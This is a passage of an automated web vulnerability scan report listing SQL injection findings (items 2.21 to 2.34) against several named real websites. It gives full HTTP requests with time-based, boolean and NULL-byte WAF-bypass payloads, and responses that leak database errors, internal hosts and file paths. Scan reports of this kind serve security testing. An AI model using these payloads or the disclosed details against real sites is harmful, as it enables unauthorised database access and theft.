Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=j3kca4chjn64leo452bv3ml9a4; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3; __utmc=147269874; __utmb=147269874.1.10.1304747384',0,0)waitfor%20delay'0%3a0%3a20'--

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 02:13:09 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5139
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
2.21. https://secure.trust-guard.com/index.php [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /index.php

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmz cookie. The application took 25028 milliseconds to respond to the request, compared with 6249 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /index.php HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
Referer: https://secure.trust-guard.com/ResetPassword.php
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)',0)waitfor%20delay'0%3a0%3a20'--; PHPSESSID=j3kca4chjn64leo452bv3ml9a4; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3; __utmc=147269874; __utmb=147269874.1.10.1304747384

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:06:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
2.22. https://secure.trust-guard.com/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter. The application took 50183 milliseconds to respond to the request, compared with 25087 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /index.php/1'waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
Referer: https://secure.trust-guard.com/ResetPassword.php
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147269874.1166530582.1303748966.1303748966.1303758698.2; PHPSESSID=j3kca4chjn64leo452bv3ml9a4

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:55:15 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
2.23. https://subscribe.haymarketmedia.com/scm/ [form parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://subscribe.haymarketmedia.com
Path:   /scm/

Issue detail

The form parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the form parameter. The application took 20441 milliseconds to respond to the request, compared with 380 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /scm/?form='waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
Host: subscribe.haymarketmedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=vdpcmz451e1pnq55altbbjzz; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 21:49:49 GMT
Content-Length: 5478


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><link href="Pubs/SC
...[SNIP]...
2.24. http://tours.sapha.com/ [scs_sid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://tours.sapha.com
Path:   /

Issue detail

The scs_sid parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the scs_sid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /?scs_sid=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+%00'&scs_tid=1488 HTTP/1.1
Host: tours.sapha.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:14:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 412

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: select SQL_CACHE * from site_options where site_ID = '-111' OR SLEEP(25)=0
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1)<br>
...[SNIP]...
2.25. http://tours.sapha.com/ [scs_sid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tours.sapha.com
Path:   /

Issue detail

The scs_sid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the scs_sid parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /?scs_sid=2546'&scs_tid=-1+OR+17-7%3d10 HTTP/1.1
Host: tours.sapha.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_tst_1=TRUE; sapha_2546_1=68004%7C40411%7C31540%7C2011-05-06+16%3A06%3A08; sapha_1_19=110363%7C2676569%7C2668748%7C2011-05-06+16%3A06%3A39

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:08:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 391

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: select SQL_CACHE * from site_options where site_ID = '2546''<br>
<b>MySQL
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2546''' at line 1)<br>
...[SNIP]...

Request 2

GET /?scs_sid=2546''&scs_tid=-1+OR+17-7%3d10 HTTP/1.1
Host: tours.sapha.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_tst_1=TRUE; sapha_2546_1=68004%7C40411%7C31540%7C2011-05-06+16%3A06%3A08; sapha_1_19=110363%7C2676569%7C2668748%7C2011-05-06+16%3A06%3A39

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:08:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 102

<html><body><h1>An error has occurred.</h1><p>Please contact support for assistance.</p></body></html>
2.26. http://tours.sapha.com/ [scs_tid parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tours.sapha.com
Path:   /

Issue detail

The scs_tid parameter appears to be vulnerable to SQL injection attacks. The payloads 29377093'%20or%201%3d1--%20 and 29377093'%20or%201%3d2--%20 were each submitted in the scs_tid parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?scs_sid=2546&scs_tid=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000074)%3C/script%3E29377093'%20or%201%3d1--%20&scscs=1 HTTP/1.1
Host: tours.sapha.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 102

<html><body><h1>An error has occurred.</h1><p>Please contact support for assistance.</p></body></html>

Request 2

GET /?scs_sid=2546&scs_tid=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000074)%3C/script%3E29377093'%20or%201%3d2--%20&scscs=1 HTTP/1.1
Host: tours.sapha.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Tour Unavailable</title>
<style type="text/css">
   body{
       margin:0;
       padding:0;
   }
   a{
   color:#9E2626;
   }
   a:hover{
    text-decoration:none;
   }
   .left {
       float:left;
   }
   #container {
       width:640px;
       margin:50px auto 20px auto;
       padding:0;
   }
   #container #content {
       margin-left: 200px;
   }
</style>
</head>
<body>
   <div id="container">
       <img class="left" src="images/alert_175x162.gif" height="162" width="175" border="0" />
       <div id="content">
           <h1>Oops!</h1>
           <p>The tour you have requested does not exist or is not currently available. Please <a href="mailto:support@sapha.com" title="Sapha Support">contact support</a> if you feel you have reached this page in error.</p>
       </div>
   </div>
</body>
</html>
2.27. http://tours.sapha.com/ [scs_tid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://tours.sapha.com
Path:   /

Issue detail

The scs_tid parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the scs_tid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /?scs_sid=2546&scs_tid=2545'&scscs=1 HTTP/1.1
Host: tours.sapha.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_tst_1=TRUE; sapha_1_19=110075%7C2676569%7C2668748%7C2011-05-06+16%3A05%3A33; sapha_2546_1=68004%7C40411%7C31540%7C2011-05-06+16%3A06%3A08

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:06:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 429

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: SELECT 1 FROM site_application t1 WHERE t1.site_application_isactive = 1 A
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...
2.28. http://www.brownrudnick.com/nr/alertsArchv.asp [Year parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.brownrudnick.com
Path:   /nr/alertsArchv.asp

Issue detail

The Year parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the Year parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft Access.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /nr/alertsArchv.asp?Year=2006' HTTP/1.1
Cookie: ASPSESSIONIDSSSASTRS=AOLLAMJAKHMOMMMNLJCHGNIN
Host: www.brownrudnick.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: */*

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 06 May 2011 18:47:11 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 13913
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQRDRRTT=LPGCALMBHBMDBAFEOEDHOHHC; path=/
Cache-control: private

<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Alerts and Newsletters -
...[SNIP]...
</i> Microsoft OLE DB Provider for ODBC Drivers<br>
...[SNIP]...
2.29. http://www.caribbean-ocean.com/accommodation2.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /accommodation2.php

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /accommodation2.php?id=8289' HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lj6iq5k4nck6ah1gcn4059tnpc0iac0k

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:35:51 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 10042

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1<br /><br /><textarea rows="10" cols="100">SEL
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/accommodation2.php on line 34
<html>
...[SNIP]...
2.30. http://www.caribbean-ocean.com/accommodation2.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /accommodation2.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /accommodation2.php?id=/1'8289 HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lj6iq5k4nck6ah1gcn4059tnpc0iac0k

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:37:44 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 10070

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/1\'8289' at line 1<br /><br /><textarea rows="10" cols="10
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/accommodation2.php on line 34
<html>
...[SNIP]...
2.31. http://www.caribbean-ocean.com/get-image.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /get-image.php

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /get-image.php?id=18696' HTTP/1.1
Referer: http://www.caribbean-ocean.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.caribbean-ocean.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 16:00:06 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Content-Length: 934
Content-Type: image/jpg

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1<br /><br /><textarea rows="10" cols="100">SEL
...[SNIP]...
</textarea>
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/get-image.php on line 15

Warning: fopen(../images/not-found.jpg): failed to open stream: No such file or directory in /home/chroot/home/james/safari/get-ima
...[SNIP]...
2.32. http://www.caribbean-ocean.com/get-image.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /get-image.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /get-image.php?id=1/1'8696 HTTP/1.1
Referer: http://www.caribbean-ocean.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.caribbean-ocean.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 16:00:17 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Content-Length: 940
Content-Type: image/jpg

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'8696' at line 1<br /><br /><textarea rows="10" cols="100"
...[SNIP]...
</textarea>
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/get-image.php on line 15

Warning: fopen(../images/not-found.jpg): failed to open stream: No such file or directory in /home/chroot/home/james/safari/get-ima
...[SNIP]...
2.33. http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Barbados%20Resort%20holidays/91

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /luxury%20Barbados%20Resort%20holidays/91' HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lj6iq5k4nck6ah1gcn4059tnpc0iac0k

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:35:57 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 6887

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
2.34. http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Jamaica%20Resort%20holidays/105

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /luxury%20Jamaica%20Resort%20holidays/105' HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lj6iq5k4nck6ah1gcn4059tnpc0iac0k

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:37:25 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 6888

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

